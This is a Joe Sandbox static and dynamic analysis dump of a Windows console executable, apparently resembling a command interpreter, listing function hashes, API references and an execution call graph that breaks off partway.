                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                      • String ID: Software\Classes
                                      • API String ID: 2714550308-1656466771
                                      • Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                      • Instruction ID: 36e82d71b92c08524ab296f4f2f6ea7e33694f3700e84ff3c0793430fad23ed6
                                      • Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                      • Instruction Fuzzy Hash: 6A41A36BA19753C1EB00EB15D848479A3A4FB44FD8FD89131DA6E47BE1DE39E842C350
                                      Function 00007FF755CACAD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ConsoleTitle
                                      • String ID: -
                                      • API String ID: 3358957663-3695764949
                                      • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                      • Instruction ID: d0c1437fda6e52d8eccd0841e9f3eb6a89a70ddf35a280c5612929b16ce08be1
                                      • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                      • Instruction Fuzzy Hash: AD3190ABA0864385EA05BB11A814078EAA4FB49FA8FDC5535DA0E177D5EF7CE841C324
                                      Function 00007FF755CB7280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsnicmpswscanf
                                      • String ID: :EOF
                                      • API String ID: 1534968528-551370653
                                      • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                      • Instruction ID: a338ac204efeab682d9f01ce4e6a564f7c1f5730d90bd022c0f100bf81e2da97
                                      • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                      • Instruction Fuzzy Hash: 7E318EBBA08A4786EA54AB15A8402B8F2E1EF45F68FCC5131DE4D46291DF2CE8518760
                                      Function 00007FF755CA3BE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsnicmp
                                      • String ID: /-Y
                                      • API String ID: 1886669725-4274875248
                                      • Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                      • Instruction ID: 04e514233eb96726ad0636311b3c86d25b527b44fa4672dc5cda1d9ae35c891f
                                      • Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                      • Instruction Fuzzy Hash: F32171ABA0879781FA10AB029854178FAA0BB45FC8F999531DE9947B94DF3CE482D310
                                      Function 00007FF755CAB62C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 3$3
                                      • API String ID: 0-2538865259
                                      • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                      • Instruction ID: 6a1b9dc1803faafaf6e58c2a64f691cfc11a786924436772f77c7bc4760ac46e
                                      • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                      • Instruction Fuzzy Hash: 56013CFFD095838AF3597B60D8842B8FA60BF80F1DFDC4939C41E015A1DF2C6485A660
                                      Function 00007FF755CB06C0 Relevance: 5.1, APIs: 4, Instructions: 97memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB06D6
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB06F0
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB074D
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB0762
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcess
                                      • String ID:
                                      • API String ID: 1617791916-0
                                      • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                      • Instruction ID: 249c2fd2851999f46b1e78e4f027ebbc0ec1d47b42b9ae21bdae294c4d01dafb
                                      • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                      • Instruction Fuzzy Hash: 124168BBA0964386EA55AB10E44417EF7A4EF85F98BCC8038CA4E17794DF3DE840C760

                                      Execution Graph

                                      Execution Coverage:5.7%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:0%
                                      Total number of Nodes:815
                                      Total number of Limit Nodes:27
                                      execution_graph 17572 7ff755cb20b2 17573 7ff755cb20cf 17572->17573 17574 7ff755cb20be 17572->17574 17578 7ff755cb211c 17573->17578 17601 7ff755cb3060 17573->17601 17575 7ff755cb8f80 7 API calls 17574->17575 17576 7ff755cb2325 17575->17576 17578->17574 17596 7ff755cb2e44 17578->17596 17580 7ff755cb2148 17580->17574 17581 7ff755cb2d70 3 API calls 17580->17581 17582 7ff755cb21af 17581->17582 17583 7ff755cab900 166 API calls 17582->17583 17585 7ff755cb21d0 17583->17585 17584 7ff755cbe04a ??_V@YAXPEAX 17584->17574 17585->17584 17586 7ff755cb22a4 ??_V@YAXPEAX 17585->17586 17587 7ff755cb221c wcsspn 17585->17587 17586->17574 17589 7ff755cab900 166 API calls 17587->17589 17590 7ff755cb223b 17589->17590 17590->17584 17591 7ff755cb2252 17590->17591 17592 7ff755cb228f 17591->17592 17594 7ff755cbe06d wcschr 17591->17594 17595 7ff755cbe090 towupper 17591->17595 17593 7ff755cad3f0 223 API calls 17592->17593 17593->17586 17594->17591 17595->17591 17595->17592 17597 7ff755cb9324 malloc 17596->17597 17598 7ff755cb2e7b 17597->17598 17599 7ff755cb2e83 memset 17598->17599 17600 7ff755cb2e90 17598->17600 17599->17600 17600->17580 17602 7ff755cb1ea0 8 API calls 17601->17602 17603 7ff755cb3084 17602->17603 17604 7ff755cbe4fc 17603->17604 17607 7ff755cb30b1 17603->17607 17605 7ff755cb417c 166 API calls 17604->17605 17610 7ff755cb311a 17605->17610 17606 7ff755cb30c8 SetErrorMode SetErrorMode GetFullPathNameW SetErrorMode 17606->17610 17607->17606 17608 7ff755cbe557 17607->17608 17609 7ff755cb417c 166 API calls 17608->17609 17609->17610 17610->17578 17610->17610 18641 7ff755ca78d0 18646 7ff755cabe00 18641->18646 18644 7ff755cabe00 647 API calls 18645 7ff755ca78f0 18644->18645 18647 7ff755ca78e4 18646->18647 18648 7ff755cabe1b 18646->18648 18647->18644 18647->18645 18648->18647 18649 7ff755cabe47 memset 18648->18649 18650 7ff755cabe67 18648->18650 18752 7ff755cabff0 18649->18752 18652 7ff755cabe73 18650->18652 18653 7ff755cabf29 18650->18653 18656 7ff755cabeaf 18650->18656 18654 7ff755cabe92 18652->18654 18657 7ff755cabf0c 18652->18657 18655 7ff755cacd90 166 API calls 18653->18655 18663 7ff755cabea1 18654->18663 18680 7ff755cac620 GetConsoleTitleW 18654->18680 18659 7ff755cabf33 18655->18659 18656->18647 18661 7ff755cabff0 185 API calls 18656->18661 18790 7ff755cab0d8 memset 18657->18790 18659->18656 18664 7ff755cabf70 18659->18664 18667 7ff755ca88a8 _wcsicmp 18659->18667 18661->18647 18663->18656 18670 7ff755caaf98 2 API calls 18663->18670 18674 7ff755cabf75 18664->18674 18903 7ff755ca71ec 18664->18903 18665 7ff755cabf1e 18665->18656 18669 7ff755cabf5a 18667->18669 18668 7ff755cabfa9 18668->18656 18671 7ff755cacd90 166 API calls 18668->18671 18669->18664 18850 7ff755cb0a6c 18669->18850 18670->18656 18673 7ff755cabfbb 18671->18673 18673->18656 18676 7ff755cb081c 166 API calls 18673->18676 18675 7ff755cab0d8 194 API calls 18674->18675 18677 7ff755cabf7f 18675->18677 18676->18674 18677->18656 18723 7ff755cb5ad8 18677->18723 18681 7ff755caca2f 18680->18681 18683 7ff755cac675 18680->18683 18682 7ff755cbc5fc GetLastError 18681->18682 18685 7ff755ca3278 166 API calls 18681->18685 18686 7ff755cb855c ??_V@YAXPEAX 18681->18686 18682->18681 18684 7ff755caca40 17 API calls 18683->18684 18695 7ff755cac69b 18684->18695 18685->18681 18686->18681 18687 7ff755cb291c 8 API calls 18694 7ff755cac762 18687->18694 18688 7ff755cac9b5 18692 7ff755cb855c ??_V@YAXPEAX 18688->18692 18689 7ff755ca89c0 23 API calls 18689->18694 18690 7ff755cac978 towupper 18690->18694 18691 7ff755cb855c ??_V@YAXPEAX 18691->18694 18693 7ff755cac855 18692->18693 18698 7ff755cac872 18693->18698 18703 7ff755cbc6b8 SetConsoleTitleW 18693->18703 18694->18681 18694->18682 18694->18687 18694->18688 18694->18689 18694->18690 18694->18691 18696 7ff755cbc60e 18694->18696 18710 7ff755cac78a wcschr 18694->18710 18711 7ff755cac83d 18694->18711 18713 7ff755caca25 18694->18713 18716 7ff755cbc684 18694->18716 18718 7ff755caca2a 18694->18718 18720 7ff755caca16 GetLastError 18694->18720 18695->18681 18695->18688 18695->18694 18697 7ff755cad3f0 223 API calls 18695->18697 18699 7ff755ccec14 173 API calls 18696->18699 18700 7ff755cac741 18697->18700 18702 7ff755cb855c ??_V@YAXPEAX 18698->18702 18699->18694 18701 7ff755cac74d 18700->18701 18705 7ff755cac8b5 wcsncmp 18700->18705 18701->18694 18706 7ff755cabd38 207 API calls 18701->18706 18704 7ff755cac87c 18702->18704 18703->18698 18707 7ff755cb8f80 7 API calls 18704->18707 18705->18694 18705->18701 18706->18694 18708 7ff755cac88e 18707->18708 18708->18663 18710->18694 18909 7ff755cacb40 18711->18909 18715 7ff755ca3278 166 API calls 18713->18715 18715->18681 18717 7ff755ca3278 166 API calls 18716->18717 18717->18681 18719 7ff755cb9158 7 API calls 18718->18719 18719->18681 18722 7ff755ca3278 166 API calls 18720->18722 18722->18681 18724 7ff755cacd90 166 API calls 18723->18724 18725 7ff755cb5b12 18724->18725 18726 7ff755cacb40 166 API calls 18725->18726 18751 7ff755cb5b8b 18725->18751 18728 7ff755cb5b26 18726->18728 18727 7ff755cb8f80 7 API calls 18729 7ff755cabf99 18727->18729 18730 7ff755cb0a6c 273 API calls 18728->18730 18728->18751 18729->18663 18731 7ff755cb5b43 18730->18731 18732 7ff755cb5bb8 18731->18732 18733 7ff755cb5b48 GetConsoleTitleW 18731->18733 18734 7ff755cb5bf4 18732->18734 18735 7ff755cb5bbd GetConsoleTitleW 18732->18735 18736 7ff755cacad4 172 API calls 18733->18736 18737 7ff755cbf452 18734->18737 18738 7ff755cb5bfd 18734->18738 18740 7ff755cacad4 172 API calls 18735->18740 18739 7ff755cb5b66 18736->18739 18742 7ff755cb3c24 166 API calls 18737->18742 18744 7ff755cbf462 18738->18744 18745 7ff755cb5c1b 18738->18745 18738->18751 18925 7ff755cb4224 InitializeProcThreadAttributeList 18739->18925 18743 7ff755cb5bdb 18740->18743 18742->18751 18985 7ff755ca96e8 18743->18985 18749 7ff755ca3278 166 API calls 18744->18749 18748 7ff755ca3278 166 API calls 18745->18748 18746 7ff755cb5b7f 18750 7ff755cb5c3c SetConsoleTitleW 18746->18750 18748->18751 18749->18751 18750->18751 18751->18727 18753 7ff755cac01c 18752->18753 18782 7ff755cac0c4 18752->18782 18754 7ff755cac022 18753->18754 18755 7ff755cac086 18753->18755 18756 7ff755cac030 18754->18756 18757 7ff755cac113 18754->18757 18759 7ff755cac144 18755->18759 18771 7ff755cac094 18755->18771 18758 7ff755cac039 wcschr 18756->18758 18769 7ff755cac053 18756->18769 18768 7ff755caff70 2 API calls 18757->18768 18757->18769 18761 7ff755cac301 18758->18761 18758->18769 18760 7ff755cac151 18759->18760 18789 7ff755cac1c8 18759->18789 19311 7ff755cac460 18760->19311 18767 7ff755cacd90 166 API calls 18761->18767 18762 7ff755cac0c6 18765 7ff755cac0cf wcschr 18762->18765 18776 7ff755cac073 18762->18776 18764 7ff755cac460 183 API calls 18764->18771 18772 7ff755cac1be 18765->18772 18765->18776 18766 7ff755cac058 18773 7ff755caff70 2 API calls 18766->18773 18766->18776 18788 7ff755cac30b 18767->18788 18768->18769 18769->18762 18769->18766 18779 7ff755cac211 18769->18779 18771->18764 18771->18782 18774 7ff755cacd90 166 API calls 18772->18774 18773->18776 18774->18789 18775 7ff755cac460 183 API calls 18775->18782 18777 7ff755cac460 183 API calls 18776->18777 18776->18782 18777->18776 18778 7ff755cac285 18778->18779 18784 7ff755cab6b0 170 API calls 18778->18784 18781 7ff755caff70 2 API calls 18779->18781 18780 7ff755cad840 178 API calls 18780->18788 18781->18782 18782->18650 18783 7ff755cab6b0 170 API calls 18783->18769 18786 7ff755cac2ac 18784->18786 18785 7ff755cad840 178 API calls 18785->18789 18786->18776 18786->18779 18787 7ff755cac3d4 18787->18776 18787->18779 18787->18783 18788->18779 18788->18780 18788->18782 18788->18787 18789->18778 18789->18779 18789->18782 18789->18785 18791 7ff755caca40 17 API calls 18790->18791 18806 7ff755cab162 18791->18806 18792 7ff755cab303 18795 7ff755cb8f80 7 API calls 18792->18795 18793 7ff755cab2f7 ??_V@YAXPEAX 18793->18792 18794 7ff755cab1d9 18798 7ff755cacd90 166 API calls 18794->18798 18813 7ff755cab1ed 18794->18813 18797 7ff755cab315 18795->18797 18796 7ff755cb1ea0 8 API calls 18796->18806 18797->18654 18797->18665 18798->18813 18800 7ff755cbbfef _get_osfhandle SetFilePointer 18803 7ff755cbc01d 18800->18803 18800->18813 18801 7ff755cab228 _get_osfhandle 18802 7ff755cab23f _get_osfhandle 18801->18802 18801->18813 18802->18813 18805 7ff755cb33f0 _vsnwprintf 18803->18805 18808 7ff755cbc038 18805->18808 18806->18794 18806->18796 18806->18806 18840 7ff755cab2e1 18806->18840 18807 7ff755cb01b8 6 API calls 18807->18813 18812 7ff755ca3278 166 API calls 18808->18812 18809 7ff755cb33f0 _vsnwprintf 18809->18808 18810 7ff755cad208 _close 18810->18813 18811 7ff755cb26e0 19 API calls 18811->18813 18814 7ff755cbc1f9 18812->18814 18813->18800 18813->18801 18813->18807 18813->18810 18813->18811 18815 7ff755cbc060 18813->18815 18817 7ff755cab038 _dup2 18813->18817 18818 7ff755cbc246 18813->18818 18823 7ff755cab356 18813->18823 18836 7ff755cbc1c3 18813->18836 18813->18840 18849 7ff755cbc1a5 18813->18849 19325 7ff755caaffc _dup 18813->19325 19327 7ff755ccf318 _get_osfhandle GetFileType 18813->19327 18816 7ff755caaf98 2 API calls 18814->18816 18815->18818 18821 7ff755cb09f4 2 API calls 18815->18821 18816->18840 18817->18813 18819 7ff755caaf98 2 API calls 18818->18819 18822 7ff755cbc24b 18819->18822 18820 7ff755cab038 _dup2 18824 7ff755cbc1b7 18820->18824 18825 7ff755cbc084 18821->18825 18826 7ff755ccf1d8 166 API calls 18822->18826 18832 7ff755caaf98 2 API calls 18823->18832 18827 7ff755cbc207 18824->18827 18828 7ff755cbc1be 18824->18828 18829 7ff755cab900 166 API calls 18825->18829 18826->18840 18831 7ff755cad208 _close 18827->18831 18833 7ff755cad208 _close 18828->18833 18830 7ff755cbc08c 18829->18830 18834 7ff755cbc094 wcsrchr 18830->18834 18846 7ff755cbc0ad 18830->18846 18831->18823 18835 7ff755cbc211 18832->18835 18833->18836 18834->18846 18837 7ff755cb33f0 _vsnwprintf 18835->18837 18836->18809 18838 7ff755cbc22c 18837->18838 18839 7ff755ca3278 166 API calls 18838->18839 18839->18840 18840->18792 18840->18793 18841 7ff755cbc106 18842 7ff755caff70 2 API calls 18841->18842 18844 7ff755cbc13b 18842->18844 18843 7ff755cbc0e0 _wcsnicmp 18843->18846 18844->18818 18845 7ff755cbc146 SearchPathW 18844->18845 18845->18818 18847 7ff755cbc188 18845->18847 18846->18841 18846->18843 18846->18846 18848 7ff755cb26e0 19 API calls 18847->18848 18848->18849 18849->18820 18851 7ff755cb1ea0 8 API calls 18850->18851 18852 7ff755cb0ab9 18851->18852 18853 7ff755cb0b12 memset 18852->18853 18854 7ff755cbd927 18852->18854 18855 7ff755cb0aee _wcsnicmp 18852->18855 18861 7ff755cb128f ??_V@YAXPEAX 18852->18861 18856 7ff755caca40 17 API calls 18853->18856 18858 7ff755cb081c 166 API calls 18854->18858 18855->18853 18855->18854 18857 7ff755cb0b5a 18856->18857 18860 7ff755cab364 17 API calls 18857->18860 18871 7ff755cbd94e 18857->18871 18859 7ff755cbd933 18858->18859 18859->18853 18859->18861 18886 7ff755cb0b6f 18860->18886 18862 7ff755cbd96b ??_V@YAXPEAX 18862->18871 18863 7ff755cb0b8c wcschr 18863->18886 18866 7ff755cbd99a wcschr 18866->18871 18867 7ff755cb0c0f wcsrchr 18867->18871 18867->18886 18868 7ff755cbd9ca GetFileAttributesW 18868->18871 18887 7ff755cbda64 18868->18887 18869 7ff755cb081c 166 API calls 18869->18886 18870 7ff755cbda90 GetFileAttributesW 18870->18871 18872 7ff755cbdaa8 GetLastError 18870->18872 18871->18862 18871->18866 18871->18868 18873 7ff755cbd9fd ??_V@YAXPEAX 18871->18873 18871->18887 18874 7ff755cbdab9 18872->18874 18872->18887 18873->18871 18874->18871 18875 7ff755cacd90 166 API calls 18875->18886 18876 7ff755cad3f0 223 API calls 18876->18886 18877 7ff755cb3060 171 API calls 18877->18886 18878 7ff755cb1ea0 8 API calls 18878->18886 18879 7ff755caaf74 170 API calls 18879->18886 18880 7ff755cb0d71 wcsrchr 18881 7ff755cb0d97 NeedCurrentDirectoryForExePathW 18880->18881 18880->18886 18881->18871 18881->18886 18882 7ff755cb291c 8 API calls 18882->18886 18883 7ff755cb0fb1 wcsrchr 18885 7ff755cb0fd0 wcschr 18883->18885 18883->18886 18884 7ff755cb2eb4 22 API calls 18884->18886 18885->18887 18888 7ff755cb0fed wcschr 18885->18888 18886->18861 18886->18863 18886->18867 18886->18869 18886->18871 18886->18875 18886->18876 18886->18877 18886->18878 18886->18879 18886->18880 18886->18882 18886->18883 18886->18884 18886->18885 18890 7ff755cb10fd wcsrchr 18886->18890 18898 7ff755cb1087 _wcsicmp 18886->18898 18900 7ff755cbda74 18886->18900 19328 7ff755cb3bac 18886->19328 19332 7ff755cb2efc 18886->19332 18888->18886 18888->18887 18890->18886 18891 7ff755cb111a _wcsicmp 18890->18891 18892 7ff755cb1138 _wcsicmp 18891->18892 18893 7ff755cb123d 18891->18893 18892->18893 18902 7ff755cb10c5 18892->18902 18894 7ff755cb1250 ??_V@YAXPEAX 18893->18894 18895 7ff755cb1175 18893->18895 18894->18895 18897 7ff755cb8f80 7 API calls 18895->18897 18896 7ff755cb1169 ??_V@YAXPEAX 18896->18895 18899 7ff755cb1189 18897->18899 18898->18900 18901 7ff755cb10a7 _wcsicmp 18898->18901 18899->18664 18900->18870 18900->18887 18901->18900 18901->18902 18902->18895 18902->18896 18905 7ff755ca7211 _setjmp 18903->18905 18908 7ff755ca7279 18903->18908 18906 7ff755ca7265 18905->18906 18905->18908 19346 7ff755ca72b0 18906->19346 18908->18668 18910 7ff755cacb63 18909->18910 18911 7ff755cacd90 166 API calls 18910->18911 18912 7ff755cac848 18911->18912 18912->18693 18913 7ff755cacad4 18912->18913 18914 7ff755cacad9 18913->18914 18922 7ff755cacb05 18913->18922 18915 7ff755cacd90 166 API calls 18914->18915 18914->18922 18916 7ff755cbc722 18915->18916 18917 7ff755cbc72e GetConsoleTitleW 18916->18917 18916->18922 18918 7ff755cbc74a 18917->18918 18917->18922 18919 7ff755cab6b0 170 API calls 18918->18919 18924 7ff755cbc778 18919->18924 18920 7ff755cbc7ec 18921 7ff755caff70 2 API calls 18920->18921 18921->18922 18922->18693 18923 7ff755cbc7dd SetConsoleTitleW 18923->18920 18924->18920 18924->18923 18926 7ff755cbecd4 GetLastError 18925->18926 18927 7ff755cb42ab UpdateProcThreadAttribute 18925->18927 18928 7ff755cbecee 18926->18928 18929 7ff755cbecf0 GetLastError 18927->18929 18930 7ff755cb42eb memset memset GetStartupInfoW 18927->18930 19022 7ff755cc9eec 18929->19022 18932 7ff755cb3a90 170 API calls 18930->18932 18934 7ff755cb43a8 18932->18934 18935 7ff755cab900 166 API calls 18934->18935 18936 7ff755cb43bb 18935->18936 18937 7ff755cb4638 _local_unwind 18936->18937 18938 7ff755cb43cc 18936->18938 18937->18938 18939 7ff755cb4415 18938->18939 18940 7ff755cb43de wcsrchr 18938->18940 19009 7ff755cb5a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 18939->19009 18940->18939 18941 7ff755cb43f7 lstrcmpW 18940->18941 18941->18939 18943 7ff755cb4668 18941->18943 19010 7ff755cc9044 18943->19010 18944 7ff755cb441a 18946 7ff755cb442a CreateProcessW 18944->18946 18948 7ff755cb4596 CreateProcessAsUserW 18944->18948 18947 7ff755cb448b 18946->18947 18949 7ff755cb4672 GetLastError 18947->18949 18950 7ff755cb4495 CloseHandle 18947->18950 18948->18947 18964 7ff755cb468d 18949->18964 18951 7ff755cb498c 8 API calls 18950->18951 18952 7ff755cb44c5 18951->18952 18956 7ff755cb44cd 18952->18956 18952->18964 18953 7ff755cb47a3 18953->18746 18954 7ff755cb44f8 18954->18953 18957 7ff755cb4612 18954->18957 18959 7ff755cb5cb4 7 API calls 18954->18959 18955 7ff755cacd90 166 API calls 18958 7ff755cb4724 18955->18958 18956->18953 18956->18954 18974 7ff755cca250 33 API calls 18956->18974 18960 7ff755cb461c 18957->18960 18962 7ff755cb47e1 CloseHandle 18957->18962 18961 7ff755cb472c _local_unwind 18958->18961 18970 7ff755cb473d 18958->18970 18963 7ff755cb4517 18959->18963 18965 7ff755caff70 GetProcessHeap RtlFreeHeap 18960->18965 18961->18970 18962->18960 18966 7ff755cb33f0 _vsnwprintf 18963->18966 18964->18955 18964->18956 18968 7ff755cb47fa DeleteProcThreadAttributeList 18965->18968 18967 7ff755cb4544 18966->18967 18969 7ff755cb498c 8 API calls 18967->18969 18971 7ff755cb8f80 7 API calls 18968->18971 18973 7ff755cb4558 18969->18973 18977 7ff755caff70 GetProcessHeap RtlFreeHeap 18970->18977 18972 7ff755cb4820 18971->18972 18972->18746 18975 7ff755cb4564 18973->18975 18976 7ff755cb47ae 18973->18976 18974->18954 18978 7ff755cb498c 8 API calls 18975->18978 18979 7ff755cb33f0 _vsnwprintf 18976->18979 18980 7ff755cb475b _local_unwind 18977->18980 18981 7ff755cb4577 18978->18981 18979->18957 18980->18956 18981->18960 18982 7ff755cb457f 18981->18982 18983 7ff755cca920 210 API calls 18982->18983 18984 7ff755cb4584 18983->18984 18984->18960 19002 7ff755ca9737 18985->19002 18987 7ff755cacd90 166 API calls 18987->19002 18988 7ff755ca977d memset 18989 7ff755caca40 17 API calls 18988->18989 18989->19002 18990 7ff755cbb76e 18992 7ff755ca3278 166 API calls 18990->18992 18991 7ff755cbb7b3 18994 7ff755cbb787 18992->18994 18993 7ff755cbb79a 18996 7ff755cb855c ??_V@YAXPEAX 18993->18996 18997 7ff755cbb795 18994->18997 19112 7ff755cce944 18994->19112 18995 7ff755cab364 17 API calls 18995->19002 18996->18991 19120 7ff755cc7694 18997->19120 19002->18987 19002->18988 19002->18990 19002->18991 19002->18993 19002->18995 19002->19002 19004 7ff755ca986d 19002->19004 19024 7ff755cb1fac memset 19002->19024 19051 7ff755cace10 19002->19051 19101 7ff755ca96b4 19002->19101 19106 7ff755cb5920 19002->19106 19005 7ff755ca9880 ??_V@YAXPEAX 19004->19005 19006 7ff755ca988c 19004->19006 19005->19006 19007 7ff755cb8f80 7 API calls 19006->19007 19008 7ff755ca989d 19007->19008 19008->18746 19011 7ff755cb3a90 170 API calls 19010->19011 19012 